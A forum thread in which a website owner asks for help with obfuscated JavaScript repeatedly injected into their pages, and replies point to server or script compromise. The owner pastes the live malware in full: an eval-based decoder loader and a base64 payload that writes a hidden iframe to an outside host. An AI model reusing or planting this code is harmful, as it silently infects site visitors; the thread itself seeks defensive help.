• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1322
  • Last Modified:

Injecting Javascript code in webpage after body tag. which download maliculous script into system

I don't know what's happening with my web server and websites. Somebody injecting some javascript code into the webpages after the body tag. When someone try to open the websiet it downloads the scripts and inject into the system. I tried to delete all hosted website and uploaded it again but no luck.
Could someone suggest me on this....
Here is the sample code of that javascript : -
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG')	</script><!-- makemecharming.com --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");
</script>

Open in new window

0
itindia
Asked:
itindia
  • 2
  • 2
  • 2
  • +1
2 Solutions
 
silemoneCommented:
when you say someone, you mean your webhost or another programmer?
0
 
itindiaAuthor Commented:
Thanks for the quick reply!! But I don't know who is the culprit as i am the only person who has the access of the websites, i meant by "Someone" that there could be a Hijacker or may me some virus who has attacked on my websites.
0
 
Tony McCreathTechnical SEO ConsultantCommented:
Is the injected code directly in an html file on the server? i.e. is it being directly changed on the server.

It could be related to the iframe attach...

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

Its initially based onfinding a password to access to the server. From there it alters website pages to do bad things.

0
 The Evil-ution of Network Security Threats

What are the hacks that forever changed the security industry? To answer that question, we created an exciting new eBook that takes you on a trip through hacking history. It explores the top hacks from the 80s to 2010s, why they mattered, and how the security industry responded.

 
itindiaAuthor Commented:
yes Tiggerito Its directly injected on the server, no user modification has been done. Its spreading the code in all HTMl, ASP and PHP files located in the server in which the  tag is exists. Basically its a virus, If someone opens the website that code execute and pointed to another URL and make your PC un-responding.

No way you can stop it but to press ESC before executing or you have to do a system restore.

I keep removing the codes from files but after some days the same thing will happen.

0
 
Tony McCreathTechnical SEO ConsultantCommented:
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.

You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.



0
 
DrAtomicCommented:
Most likely your server isn't compromised but one of your scripts is being abused, the abused script will have access to all files under the same user account. Start by giving each domain it's own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself then apply Tiggerito his suggestion.
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

  • 2
  • 2
  • 2
  • +1
Tackle projects and never again get stuck behind a technical roadblock.
Join Now